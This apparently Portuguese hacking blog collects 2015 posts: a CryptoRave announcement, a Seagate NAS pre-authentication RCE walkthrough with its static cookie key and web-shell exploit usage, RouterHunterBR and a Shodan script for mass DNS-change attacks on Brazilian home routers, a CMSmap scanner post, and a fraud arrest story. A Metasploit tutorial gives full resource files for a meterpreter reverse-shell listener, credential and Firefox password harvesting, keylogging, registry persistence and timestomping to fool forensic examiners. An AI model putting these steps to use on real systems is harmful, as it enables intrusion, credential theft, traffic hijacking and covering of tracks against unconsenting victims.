Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

quarta-feira, 11 de março de 2015

CryptoRave 2015 - 24 horas pela liberdade e privacidade na rede.

24 horas pela liberdade e privacidade na rede.
e18ce10144839b45af82b6bd5385b1f3
Em um mundo no qual precisamos das redes digitais para nos comunicar, nos informar e nos organizar, como resistir contra a vigilância em massa e a invasão de nossa privacidade? A CryptoRave 2015 é um evento de 24 horas contra a espionagem massiva, contra a violação das comunicações, em defesa da privacidade e da liberdade nas redes digitais. É um esforço coletivo para popularizar o uso de ferramentas de criptografia e de privacidade e para ampliar a segurança das pessoas que se comunicam nas redes. É um evento em defesa do direito à privacidade e da liberdade.  Entre 24 e 25 de abril de 2015 vamos realizar a segunda edição do encontro. A primeira CryptoRave foi em abril de 2014 em São Paulo e contou com a participação de aproximadamente 1000 (mil) pessoas. Os mesmos coletivos que organizaram a CryptoRave em 2014 (Actantes, Saravá, Escola de Ativismo), além de outros parceiros e indivíduos, vão realizar um grande evento para popularizar técnicas de privacidade, navegação anônima e práticas anti-vigilantistas e também discutir sobre os rumos da luta pela liberdade na rede.  A CryptoRave2015 seguirá o modelo adotado no ano passado, com atividades como oficinas, exposições, debates e palestras durante 24 horas ininterruptas, além da balada durante a madrugada, com DJ's e VJ's. Ao final, as pessoas realizarão a assinatura de suas chaves criptográficas para que possam se comunicar pelas redes de modo mais seguro. Haverá mais de 37 atividades e oficinas, além de palestras relâmpagos e do Espaço Ada, com atividades dedicadas a mulheres.

Em um mundo no qual precisamos das redes digitais para nos comunicar, nos informar e nos organizar, como resistir contra a vigilância em massa e a invasão de nossa privacidade? A CryptoRave 2015 é um evento de 24 horas contra a espionagem massiva, contra a violação das comunicações, em defesa da privacidade e da liberdade nas redes digitais. É um esforço coletivo para popularizar o uso de ferramentas de criptografia e de privacidade e para ampliar a segurança das pessoas que se comunicam nas redes. É um evento em defesa do direito à privacidade e da liberdade.

Entre 24 e 25 de abril de 2015 vamos realizar a segunda edição do encontro. A primeira CryptoRave foi em abril de 2014 em São Paulo e contou com a participação de aproximadamente 1000 (mil) pessoas. Os mesmos coletivos que organizaram a CryptoRave em 2014 (Actantes, Saravá, Escola de Ativismo), além de outros parceiros e indivíduos, vão realizar um grande evento para popularizar técnicas de privacidade, navegação anônima e práticas anti-vigilantistas e também discutir sobre os rumos da luta pela liberdade na rede.

A CryptoRave2015 seguirá o modelo adotado no ano passado, com atividades como oficinas, exposições, debates e palestras durante 24 horas ininterruptas, além da balada durante a madrugada, com DJ's e VJ's. Ao final, as pessoas realizarão a assinatura de suas chaves criptográficas para que possam se comunicar pelas redes de modo mais seguro. Haverá mais de 37 atividades e oficinas, além de palestras relâmpagos e do Espaço Ada, com atividades dedicadas a mulheres.



Este ano vamos receber convidados internacionais como:
  • . Peter Sunde, fundador do legendário site de compartilhamento de arquivos The Pirate Bay; 
  • . Micah Anderson, ativista e desenvolvedor do projeto LEAP ( https://leap.se ) e do sistema operacional livre Debian ( https://debian.org );
  • . Katitza Rodrigues, ativista da Electronic Frontier Foundation ( EFF - https://eff.org/ );
  • . Andre Meister, ativista pelos direitos digitais, jornalista investigativo sobre temas do digital.
A CryptoRave 2015 é aberta ao público em geral e mais especificamente a jovens, estudantes, jornalistas, publicitários, artistas, professores e diversos profissionais ou amadores, que queiram aprender a usar técnicas de comunicação segura. Visa também reunir ativistas e integrantes dos movimentos que querem defender sua comunicação de intrusos e arapongas, estatais e privados.

Orçamento

Como o dinheiro será gasto?
Usaremos os recursos arrecadados aqui para contribuir com a cobertura dos gastos no evento, principalmente para disponibilizar uma boa conexão de internet e streaming, e para trazer os convidados internacionais.


0xAJUDE NO FINANCIAMENTO:

https://www.catarse.me/pt/cryptorave2015
Doação via bitcoin para o endereço: 
122vFTdDHkNTWKE8JBVGgeuoKLFbKm8D5Q
-----------------------------------------------------------------------------------------------
CONTATO:
https://cryptorave.org/
https://twitter.com//cryptoravebr

quarta-feira, 4 de março de 2015

Roteadores vulneráveis (password.cgi)




  Recentemente desenvolvemos o scanner RouterHunter BR que trabalha pela internet procurando por faixa de ips pre-definidas ou aleatórias encontrando routers(roteadores) caseiros vulneráveis a vulnerabilidade DNSchanger.

 Routeh

 Então me veio a ideia de montar um script separado que trabalha-se com o Shodan fazendo praticamente um trabalho parecido com o do routerhunter. A unica diferença do routerhunter para esse script é que ele trabalha juntamente com o Shodan com uma dork(filter) definida procurando por ips das operadoras (CTBC, OI, GVT, TELEFONICA) que são as principais operadoras com routers(roteadores) vulneráveis e verificando se pagina (password.cgi) está online ou não. (password.cgi) é uma pagina dentro do router que não requisita autenticação!

  Nesses mesmos modelos de roteadores que é encontrada a pagina (password.cgi), Também pode ser encontrado o GET "dnscfg.cgi?dnsPrimary=DNS1&dnsSecondary=DNS2&dnsDynamic=0&dnsRefresh=1" que está presente no routerhunter. Então vamos colocar a mão na massa!

   Antes vamos instalar as dependências necessárias para a utilização do script:

  Depois de instalada todas as dependências vamos para a utilização do script.

Vocês iram precisar criar uma conta no Shodan.io
2 Vocês também iram precisar uma apikey para definir no código
3 Com a apikey nas mãos coloque ela na variável "key" na linha 31

  Vamos a execução do script

python routeh.py
  Ele ira iniciar o scan por ips no Shodan com a dork(filter) definida "DSL Router micro_httpd". Depois ele ira te retornar os IPS testados.

Processo Manual

 O processo manual seria de duas formas utilizando o Scanhub e o Nmap

No Scanhub você pode utilizar esse filtro "((DSL Router micro_httpd) AND country:"br") AND service_names:http"

No nmap você irar usar o comando "nmap -sV -p 80 189.15.100.0-255" 

DEMO
https:/github.com/jh00nbr 
http://twitter.com/jh00nbr

segunda-feira, 2 de março de 2015

Seagate Business NAS / Pre-Authentication Remote Code Execution (0day)

Seagate é um fornecedor bem conhecido em soluções de hardware, com produtos disponíveis em todo o mundo. Sua linha de produtos NAS dirigidas às empresas é chamado de Business Storage 2-Bay NAS. Estes podem ser encontrados dentro de redes domésticas e empresariais e, em muitos casos, eles são expostos publicamente.
Seagate é um fornecedor bem conhecido em soluções de hardware, com produtos disponíveis em todo o mundo. Sua linha de produtos NAS dirigidas às empresas é chamado de Business Storage 2-Bay NAS. Estes podem ser encontrados dentro de redes domésticas e empresariais e, em muitos casos, eles são expostos publicamente.


Os produtos que executam versões de firmware até a versão 2014,00319 foram encontrados vulnerabilidades que permitem a execução remota de código como usuário root.
Essas vulnerabilidades são exploráveis sem necessidade de qualquer forma de autorização no dispositivo.

Detalhes da Vulnerabilidade

Produtos Business Storage 2-Bay NAS vem com um aplicativo de gerenciamento de web habilitado. Este aplicativo permite que os administradores executem funções de configuração de dispositivos usuais, como a adição de usuários, a criação de controle de acesso, gerenciamento de arquivos etc...

A aplicação web é construído com as seguintes tecnologias de base:

  1. PHP versão 5.2.13 (Lançado 25 de fevereiro de 2010)
  2. CodeIgniter 2.1.0 (23 Lançado em novembro de 2011)
  3. Lighttpd 1.4.28 (Lançado 22 de agosto de 2010)

Todas essas três tecnologias são claramente desatualizadas, e as versões listadas do PHP e CodeIgniter são conhecidos por terem problemas de segurança. Em cima dessas tecnologias seta uma aplicação PHP personalizado, que contém em si uma série de brechas relacionadas à segurança é digamos bem problemático.

Detalhes sobre as tecnologias setadas acima o porque estão defasadas, tais versões.

PHP 5.2.3

As versões do PHP anteriores à 5.3.4 permitir aos usuários especificar caminhos de arquivo que incluem um byte NULL (CVE-2006-7243). Essa brecha permite que os dados controlados pelo usuário para encerrar prematuramente caminhos de arquivo, permitindo controle total sobre a extensão do arquivo.
Demonstrado por .php\0.jpg no final do argumento para a função file_exists.

CodeIgniter 2.1.0

Versões do CodeIgniter  2.2.0 criam tokens de sessão que são constituídos de um array associativo PHP serializado (hash), que foi criptografada usando um algoritmo personalizado.
Este hash de PHP contém dados controladas pelo utilizador, o que torna possível para os usuários uma extração de chave pa (criptografar e descriptografar) o conteúdo do cookie (CVE-2014-8686). Uma vez decifrados, os usuários podem modificar o conteúdo do cookie e re-encrypt antes de enviá-lo de volta para o servidor, resultando em outros vetores de ataque potenciais, incluindo PHP object injection.

Exploitation / Bypass

É simples de explorar os problemas listados acima para obter a execução de código arbitrário no dispositivo como o usuário root. Os principais passos necessários para alcançar este objectivo são:

O atacante deve escrever código PHP para o sistema de arquivos no NAS.
Isso pode ser feito de várias maneiras, incluindo:

  1. HTTP access envenenamento arquivo de log por meio do cabeçalho User-Agent.
  2. HTTP error envenenamento arquivo de registro através do cabeçalho do host.
  3. Modificando a descrição do dispositivo na interface do aplicativo web. Este escreve cadeias controladas pelo usuário para um arquivo localizado em /etc/DeviceDesc, no entanto, requer direitos administrativos.
  4. Upload de arquivos para um compartilhamento de arquivo que o dispositivo tenha exposto. 
  • O atacante deve, então, manipular o conteúdo da variável de idioma no cookie de sessão para que ele contém o caminho para o PHP controlado pelo invasor no sistema de arquivos.
  • A falha byte NULL em PHP deve ser utilizado no fim de este valor para forçar o PHP ignorar quaisquer caracteres que são acrescentados ao caminho do arquivo pelo aplicativo web.
  • O invasor, então, faz um pedido com os cookies manipulados, resultando na execução de código como root.

O Script-Exploit

 Beyond Binary(https://beyondbinary.io/) produziu um módulo Metasploit e um script Python standalone que automatizar o processo de exploração. Cada um desses scripts ter a seguinte abordagem:

  1. Conecta-se a meta de NAS e extrai um cookie ci_session.
  2. Decifrar o cookie usando a chave de criptografia estática de 0f0a000d02011f0248000d290d0b0b0e03010e07 e extrair o hash PHP.
  3. Modifica o hash PHP serializado para que o nome de usuário é definido como administrador e o campo is_admin está definido para yes.
  4. Criptografe essa hash atualizando o PHP pronto para uso posterior como um cookie ci_session. Este cookie permite agora que os futuros pedidos para operar no NAS como se fossem um administrador("DILIÇÇA CARA").
  5. Executar um pedido para extrair a configuração do host, que inclui a descrição do dispositivo.
  6. Modificar a configuração de host para que a descrição do dispositivo contenha uma pequena stager payload.
  7. Executar uma solicitação para atualizar a configuração do host com os novos dados, de modo que a stager payload é gravado em /etc/DeviceDesc.
  8. Modificar o hash PHP novamente para que o parâmetro de idioma contenha o  ../../../../etc/devicedesc\x00 como valor (note o byte NULL no final).
  9. Criptografar a nova hash PHP pronto para uso futuro como um cookie ci_session.
  10. Executar um pedido para NAS usando o cookie criado na etapa anterior. Isso chama a stager que foi escrito para o disco. Pedindo um mensagens como uma carga maior, que é gravado em disco na raiz do servidor web.
  11. Executa um outro pedido que, em seguida, redefine a configuração de host de volta ao que era antes da exploração.
Shodan(https://www.shodan.io/) relata que há mais de 2.500 dispositivos expostos publicamente na Internet que são possíveis vulneráveis.

Explots disponíveis para download aqui:

Beyond Binary(https://beyondbinary.io/) produziu um módulo Metasploit e um script Python standalone que automatizar o processo de exploração. Cada um desses scripts ter a seguinte abordagem:  Conecta-se a meta de NAS e extrai um cookie ci_session. Decifrar o cookie usando a chave de criptografia estática de 0f0a000d02011f0248000d290d0b0b0e03010e07 e extrair o hash PHP. Modifica o hash PHP serializado para que o nome de usuário é definido como administrador e o campo is_admin está definido para yes. Criptografe essa hash atualizando o PHP pronto para uso posterior como um cookie ci_session. Este cookie permite agora que os futuros pedidos para operar no NAS como se fossem um administrador("DILIÇÇA CARA"). Executar um pedido para extrair a configuração do host, que inclui a descrição do dispositivo. Modificar a configuração de host para que a descrição do dispositivo contenha uma pequena stager payload. Executar uma solicitação para atualizar a configuração do host com os novos dados, de modo que a stager payload é gravado em /etc/DeviceDesc. Modificar o hash PHP novamente para que o parâmetro de idioma contenha o  ../../../../etc/devicedesc\x00 como valor (note o byte NULL no final). Criptografar a nova hash PHP pronto para uso futuro como um cookie ci_session. Executar um pedido para NAS usando o cookie criado na etapa anterior. Isso chama a stager que foi escrito para o disco. Pedindo um mensagens como uma carga maior, que é gravado em disco na raiz do servidor web. Executa um outro pedido que, em seguida, redefine a configuração de host de volta ao que era antes da exploração.

----------------------------------------------------------------------------------------------------
https://beyondbinary.io/exploits/bbsec001/seagate_nas_php_exec_noauth.rb
OU
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb
----------------------------------------------------------------------------------------------------
https://beyondbinary.io/exploits/bbsec001/seagate_nas_php_exec_noauth.py
OU
http://www.exploit-db.com/exploits/36202/
----------------------------------------------------------------------------------------------------

Seagate Business NAS <= 2014.00319 - Pre-Authentication Remote Code Execution (0day)

Some Seagate Business NAS devices are vulnerable to command execution via a local file include vulnerability hidden in the language parameter of the CodeIgniter session cookie. The vulnerability manifests in the way the language files are included in the code on the login page, and hence is open to attack from users without the need for authentication. The cookie can be easily decrypted using a known static encryption key and re-encrypted once the PHP object string has been modified. This module has been tested on the STBN300 device.

CVE-2014-8684 , CVE-2014-8686 , CVE-2014-8687

 Usage
 =====
 seagape.py <ip> <port> [-c [ua]]

 - ip   : ip or host name of the target NAS
 - port : port of the admin web ui
 - -c   : (optional) create a cookie which will give admin access.
          Not specifying this flag results in webshell installation.
 - ua   : (optional) the user agent used by the browser for the
          admin session (UA must match the target browser).
          Default value is listed below

 Example
 =======
 Install and interact with the web shell:
 seagape.py 192.168.0.1 80

 Create admin cookie
 seagape.py 192.168.0.1 80 -c
http://1337day.com/exploit/23338
----------------------------------------------------------------------------------------------------

REF:
http://www.rapid7.com/db/vulnerabilities/php-cve-2006-7243
https://beyondbinary.io/advisory/seagate-nas-rce/

segunda-feira, 23 de fevereiro de 2015

Metasploit automatização resource files

Trabalhando com resource files

O console (msfconsole ou msf pro) suporta automação básica usando scripts de recursos. Esses scripts contêm um conjunto de comandos do console que são executadas quando as cargas de script. Além dos comandos básicos do console (core), esses scripts também são tratados como modelos ERB. ERB é uma maneira de incorporar o código Ruby diretamente em um documento. Isso permite que você chamar APIs que não são expostos através de comandos de console e até programaticamente gerar e retornar uma lista de comandos com base em sua própria lógica. Scripts de recursos podem ser especificados com a opção -r para o Console Metasploit e é executado automaticamente na inicialização se ele existir. Scripts de recursos também pode ser executado a partir do prompt do console por meio do comando de recursos (msf  > resource file-to-run.rc)


O console (msfconsole ou msf pro) suporta automação básica usando scripts de recursos. Esses scripts contêm um conjunto de comandos do console que são executadas quando as cargas de script. Além dos comandos básicos do console (core), esses scripts também são tratados como modelos ERB. ERB é uma maneira de incorporar o código Ruby diretamente em um documento. Isso permite que você chamar APIs que não são expostos através de comandos de console e até programaticamente gerar e retornar uma lista de comandos com base em sua própria lógica. Scripts de recursos podem ser especificados com a opção -r para o Console Metasploit e é executado automaticamente na inicialização se ele existir. Scripts de recursos também pode ser executado a partir do prompt do console por meio do comando de recursos (msf  > resource file-to-run.rc)



O seguinte exemplo cria um arquivo de recurso para exibir o número da versão do metasploit.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch version.rc
echo 'version' >> version.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run  :  msfconsole -r version.rc
or    :  msfconsole -r /root/version.rc
or    :  msf > resource /root/version.rc



este arquivo de recurso irá carregar um directorio externo (ao msf) para que você possa apontar Metasploit aos seus 0-day, exploits, codificadores, cargas úteis (payloads), se estão a desenvolver exploits, auxiliarys, pós-módulos em ruby, então esta é a opção perfeita para que você possa carregar o seu directorio de trabalho no banco de dados do metasploit.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch startconf.rc
echo 'loadpath /home/secret/0day' >> startconf.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msfconsole -r startconf.rc
or     :  msfconsole -r /root/startconf.rc
or     :  msf > resource /root/startconf.rc



Vamos criar um arquivo de recurso para iniciar um multi-manipulador (multi-handler) para nós. 
este 'listenner' vai receber a nossa carga útil (payload) reverse_tcp meterpreter.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch shell_listenner.rc
echo 'use exploit/multi/handler' >> shell_listenner.rc
echo 'set PAYLOAD windows/meterpreter/reverse_tcp' >> shell_listenner.rc
echo 'set LPORT 666' >> shell_listenner.rc
echo 'set LHOST 192.168.1.68' >> shell_listenner.rc
echo 'set ExitOnSession false' >> shell_listenner.rc
echo 'exploit -j -z' >> shell_listenner.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msfconsole -r shell_listenner.rc
or     :  msfconsole -r /root/shell_listenner.rc
or     :  msf > resouce shell_listenner.rc



Scripts de auto-run são exelentes quando você precisa que varios módulos executem automaticamente
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch autoruncommands.rc
echo 'run post/windows/manage/migrate' >> autoruncommands.rc
echo 'run post/windows/gather/checkvm' >> autoruncommands.rc
echo 'run post/windows/gather/credential_collector' >> autoruncommands.rc
echo 'run post/multi/gather/firefox_creds' >> autoruncommands.rc
echo 'run post/windows/capture/keylog_recorder' >> autoruncommands.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msf > run multi_console_command -rc /root/autoruncommands.rc
ou executá-la no multi-manipulador (multi-handler) usando a flag AutoRunScript
run   : msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/autoruncommands.rc' E
desta forma só precisamos de configurar o 'autorunscript' para apontar para o nosso arquivo de recursos, de modo que toda a vez que o manipulador (multi-handler) abre uma sessão irá executar todos os modulos escritos dentro do arquivo 'autoruncommands.rc'



O exemplo a seguir mostra como podemos persistir uma carga útil (payload) em post-exploração
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch Post-Auto.rc
echo 'sysinfo' >> Post-Auto.rc
echo 'run migrate -n wininit.exe' >> Post-Auto.rc
echo 'upload /var/www/powershell.bat C:\\windows\\system32\\powershell.bat' >> Post-Auto.rc
echo 'upload /var/www/hidden.vbs C:\\windows\\system32\\hidden.vbs' >> Post-Auto.rc
echo 'reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v persistence -d "C:\windows\system32\hidden.vbs"' >> Post-Auto.rc
echo 'reg enumkey -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' >> Post-Auto.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/Post-Auto.rc' E



Neste proximo exemplo vamos usar o nmap para escanear a nossa rede local em busca de hospedeiros vivos e exportar o relatorio em (.xml) formato, depois vamos construir um arquivo de recurso (msfdb.rc) para podermos exportar o arquivo xml para a base de dados do metasploit, para os hospedeiros encontrados poderem ser usados no metasploit.
escannear usando o nmap:
nmap -sV -Pn -p 1-1000 -O --open -oX /root/Random-Hosts.xml 192.168.1.0/24
contruindo resource file:
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch msfdb.rc
echo 'db_import /root/Random-Hosts.xml' >> /root/msfdb.rc
echo 'hosts' >> /root/msfdb.rc
echo 'sevices' >> /root/msfdb.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
correr metasploit:
service metasploit start
msfconsole -r /root/msfdb.rc
limpar database:
msf > hosts -d
msf > services -d



As vezes no post-exploração precissamos de encobrir os nossos passos no systema alvo para enganar peritos forensicos, uma maneira de fazer isso é manipular o timestomp (mace) de um arquivo ou de um directorio (recursive) no exemplo a seguir vamos fazer o upload de um arquivo para o hospedeiro de destino e mudar o seu valor mace para outra data/hora para que o arquivo pareça ter sido criado/acessado no ano 2013, a flag (-r) permite-nos mudar o mace de todos os arquivos dentro de um directorio.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch mace.rc
echo 'run migrate -n wininit.exe' >> mace.rc
echo 'upload /var/www/powershell.ps1 %temp\\powershell.ps1%' >> mace.rc
echo 'timestomp -r %temp% "21/01/2013 23:26:35"' >> mace.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   : meterpreter > resource /root/mace.rc



O arquivo de recurso seguinte (scanner.rc) requer que o usuário defina RHOSTS globalmente usando: setg RHOSTS 192.168.1.68 (ip alvo) antes de lançar o resource file, e ele se usa do commando 'db_nmap' para salvar o scan feito na base de dados do metasploit. na tag <ruby> usamos o nmap para escannear por vulnerabilidades no protocol smb e samba que serão guardados em 'services' e 'vulns', depois da tag </ruby> o resource file vai se usar dos resultados contidos na DB para correr modulos de post-exploração.
----------------------------------------------------------------------------------------------------------------------------------------------------------
<ruby>
run_single("db_nmap -sU -sS -Pn -n --script=smb-check-vulns.nse,samba-vuln-cve-2012-1182 --script-args=unsafe=1 -p U:135,T:139,445 #{framework.datastore['RHOSTS']}")
run_single("services #{framework.datastore['RHOSTS']}")
run_single("vulns #{framework.datastore['RHOSTS']}")
</ruby>
use auxiliary/scanner/snmp/snmp_enum
run
use auxiliary/scanner/snmp/snmp_enumusers
run
use auxiliary/scanner/snmp/snmp_enumshares
run
----------------------------------------------------------------------------------------------------------------------------------------------------------
antes do resource file ser lançado:  msf > setg RHOSTS <target ip>
run  resource file:  msf > resource scanner.rc
unset global var: msf > unsetg RHOSTS
clean msf database: msf > hosts -d






quinta-feira, 19 de fevereiro de 2015

Conheça o scanner CMSmap feito em python que verifica (WordPress, Joomla e Drupa)


CMSmap é um scanner de código aberto CMS python que automatiza o processo de detecção de falhas do CMSs mais popular de segurança. O principal objetivo do CMSmap é integrar as vulnerabilidades comuns para diferentes tipos de CMSs em uma única ferramenta.  No momento, CMSs apoiado por CMSmap são WordPress, Joomla e Drupal.  Por favor, note que este projeto é um estado inicial. Como tal, você pode encontrar erros, falhas ou mulfunctions. Use por sua conta e risco!  Installation diretamente GIT: git clone https://github.com/Dionach/CMSmap.git


CMSmap é um scanner de código aberto CMS python que automatiza o processo de detecção de falhas do CMSs mais popular de segurança. O principal objetivo do CMSmap é integrar as vulnerabilidades comuns para diferentes tipos de CMSs em uma única ferramenta.

No momento, CMSs apoiado por CMSmap são WordPress, Joomla e Drupal.

Por favor, note que este projeto é um estado inicial. Como tal, você pode encontrar erros, falhas ou mulfunctions. Use por sua conta e risco!

Installation diretamente GIT:
git clone https://github.com/Dionach/CMSmap.git


CMSmap tool v0.3 - Simple CMS Scanner
Author: Mike Manzotti [email protected]
Usage: cmsmap.py -t 
          -t, --target    target URL (e.g. 'https://abc.test.com:8080/')
          -v, --verbose   verbose mode (Default: false)
          -T, --threads   number of threads (Default: 5)
          -u, --usr       username or file 
          -p, --psw       password or file
          -i, --input     scan multiple targets listed in a given text file
          -o, --output    save output in a file
          -k, --crack     password hashes file
          -w, --wordlist  wordlist file (Default: rockyou.txt - WordPress only)       
          -a, --agent     set custom user-agent  
          -U, --update    (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules
          -f, --force     force scan (W)ordpress, (J)oomla or (D)rupal
          -F, --fullscan  full scan using large plugin lists. Slow! (Default: false)
          -h, --help      show this help   

Example: cmsmap.py -t https://example.com
         cmsmap.py -t https://example.com -f W -F
         cmsmap.py -t https://example.com -i targets.txt -o output.txt
         cmsmap.py -t https://example.com -u admin -p passwords.txt
         cmsmap.py -k hashes.txt


Uso de CMSmap para atacar alvos sem prévio consentimento mútuo é ilegal. É de responsabilidade do usuário final a obedecer todas as leis aplicáveis locais, estaduais e federais. Os desenvolvedores não assumimos nenhuma responsabilidade e não somos responsáveis por qualquer uso indevido ou danos causados por este programa.

sexta-feira, 13 de fevereiro de 2015

Scanner RouterhunterBR 1.0 - explorando roteadores

 
Hoje iremos apresentar o RouterhuntertBR 1.0!

Mas oque é o RouterhunterBR? Como funciona? Qual finalidade ?

  Inicialmente o RouterhunterBR foi desenvolvido para explorar vulnerabilidades DNSChanger em routers caseiros que possuem falhas em paginas  sem autenticação dentro do roteador, 
Assim modificando o DNS padrão dentro do roteador.

 Uma vez modificado o DNS padrão para o DNS Malicioso, você pode realizar o redirecionamento do trafego para paginas maliciosas.

  Como funciona o DNS?
O DNS (Domain Name System) é o serviço responsável por traduzir nomes em IP’s e vice-versa, isto é, quando escrevemos www.xxware.com, há uma consulta ao DNS para saber qual o IP correspondente.

O que é o DNSChanger?
O DNSChanger é um trojan capaz de redirecionar pedidos do utilizador para sites ilícitos. Na prática, este malware tem a capacidade de alterar as configurações do DNS da nossa máquina redirecionando o utilizador para sites com fins maliciosos. Imagine por exemplo que o seu sistema está infectado por este malware, aquilo que poderá acontecer é que o utilizador ao aceder a um determinado site (ex. facebook.com) poderá ser reencaminhado para um site não solicitado e potencialmente ilegal.


O RouterhunterBR funciona da seguinte maneira, ele roda pela internet procurando por faixas de ips pre-definidas ou aleatórias com intuito de explorar vulnerabilidade DNSChanger em routers(roteadores) caseiros. Por inicio está e a principal função do RouterHunter!, mas em breve novas atualizações estão por vir.

O RouterhunterBR funciona da seguinte maneira, ele roda pela internet procurando por faixas de ips pre-definidas ou aleatórias com intuito de explorar vulnerabilidade DNSChanger em routers(roteadores) caseiros. Por inicio está e a principal função do RouterHunter!, mas em breve novas atualizações estão por vir


* Description:*
  The script explores two vulnerabilities in routers
  01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit
  reference: http://www.exploit-db.com/exploits/35995/

  02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
  reference: http://www.exploit-db.com/exploits/35917/

  03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit
  reference: http://www.exploit-db.com/exploits/36014/

  ----------------------------------------------------------

 * Execute*
  Simple search:   php RouterHunterBR.php --range '177.100.255.1-20' -- dns1  8.8.8.8 --dns2 8.8.4.4 --output result.txt

Set IPS random:
php RouterHunterBR.php --rand --limit-ip 200 --dns1  8.8.8.8 --dns2 8.8.4.4 --output result.txt

Set source file:
php RouterHunterBR.php --file ips.txt --dns1  8.8.8.8 --dns2 8.8.4.4 --output result.txt

Set proxy:      
php RouterHunterBR.php --range '177.100.255.1-20' --dns1  8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118'
  Proxy format:

  •   --proxy 'localhost:8118'
  •  --proxy 'socks5://googleinurl@localhost:9050'
  •  --proxy 'http://admin:[email protected]:8080'

  ----------------------------------------------------------

 * Dependencies*
sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033

VÍDEO

quinta-feira, 12 de fevereiro de 2015

Downloader Aptoide APK

O que é a ferramenta, após renovar o seu site a APTOIDE mudou os métodos de Download, antes você entrava com a versão mobile, e baixava um .myapp e nele contia um link para Download do APK sem ter que baixar o Aplicativo oferecido pelo site, porém agora com a nova versão do web site deles, isso não é mais possível você tem que pegar diversas infos para chegar até esse um ".xml" e poder pegar esse link para download para baixar pelo Computador, pensando nisso foi criado o Downloader Aptoide APK v.1.1 Beta onde você pode colocar o seu link e baixar sem ter que ficar procurando as infos, e sem precisar baixar a APTOIDE em seu celular.

[+] Especificações Downloader Aptoide APK: 

O que é a ferramenta, após renovar o seu site a APTOIDE mudou os métodos de Download, antes você entrava com a versão mobile, e baixava um .myapp e nele contia um link para Download do APK sem ter que baixar o Aplicativo oferecido pelo site, porém agora com a nova versão do web site deles, isso não é mais possível você tem que pegar diversas infos para chegar até esse um ".xml" e poder pegar esse link para download para baixar pelo Computador, pensando nisso foi criado o Downloader Aptoide APK v.1.1 Beta onde você pode colocar o seu link e baixar sem ter que ficar procurando as infos, e sem precisar baixar a APTOIDE em seu celular.
----------------------------------------------------------

[+] Modo de usar:

1º Após pegar uma URL no site da APTOIDE de um app, vá até o site da ferramenta: http://breskott.tk/aptoide/ e cole no campo de URL e clique em "Gerar Link".
2º Após isso ele irá retornar uma página contendo o nome do APP e o nome da Loja, juntamente com seu Link Direto para baixar pelo PC e então transferir para o Celular sem precisar da APTOIDE.
3º Clique em "Download Direto" e irá iniciar automáticamente o Download
4º Finish..
----------------------------------------------------------

[+] Suporte:

Por ser uma versão Beta pode ocorrer erros, caso aconteça algum envie um e-mail para: [email protected]

sábado, 7 de fevereiro de 2015

Preso (Cracker) que causou prejuízo de R$ 5 milhões; golpes atingiam lojas virtuais e clientes delas



Leandro de Souza Simiema de 36 anos foi preso em flagrante após fazer compras pela internet e de ter pago através de contas bancárias hackeadas  de terceiros. Segundo a polícia, desde 2013 o prejuízo que o homem causou pode chegar a aproximadamente R$ 5 milhões.

Foi a maior volume de transações financeiras via Crackers que a polícia goiana conseguiu detectar.

Na ocasião ele havia feito compras de aparelhos celulares modelo Iphone 5 para revender. A prisão se deu na casa dele, nesta quinta-feira (5) na Vila Maria José, em Goiânia. Ocorreu no momento em que ele havia acabado de receber uma encomenda no valor de R$ 20 mil.

A prisão de Leandro evitou um prejuízo de R$150 mil reais em outras movimentações que havia feito ainda na madrugada de quinta.  De acordo com a adjunta da Delegacia Estadual de Investigações Criminais de Goiás (Deic) delegada Mayana Rezende, as mercadorias eram compradas de sites de lojas virtuaisconhecidas no mercado. Para efetivar a compra ele contava com a ajuda de outra pessoa.

“A partir do momento que ele conhecia a aprovação da conta, ele emitia o boleto e através do código de barras deste boleto, ele encaminhava para um Cracker no Pará. Este fazia o pagamento através de contas hackeadas. No caso em que pegamos em flagrante, é referente a uma vítima de São Paulo”, destaca a delegada.

Para realizar a compra, Leandro coletava números de CPFs de terceiros pela internet e abria e-mails falsos. Depois emitia o boleto bancário e passava para outro Cracker.

“Tem alguns indícios que a gente achou no computador dele que realmente, mas a associação dele tem ramificações não só no Pará, também em Minas. É um grupo criminoso muito forte até mesmo pelo volume financeiro de compras que encontramos no computador dele. Tinha uma contabilidade muito organizada, dividido por ano e mês”, relata Mayana Rezende.

Caixas vazias
Na casa de Leandro foram encontradas nove caixas de celulares vazias. Há informações de que o acusado, além de hackear,  praticava outro crime: enganava pessoas na hora da venda.

Como ele pagava os aparelhos com boletos bancários, gerava nota fiscal. Os preços eram praticamente os de mercado, com poucas diferenças, o que chamava a atenção de consumidores.

No entanto, em alguns casos ele apenas enviava caixas vazias, algumas ele colocava pilhas para dar um pouco de peso. Quando as pessoas abriam certificavam que tinham sido enganadas.

Dificuldade na prisão
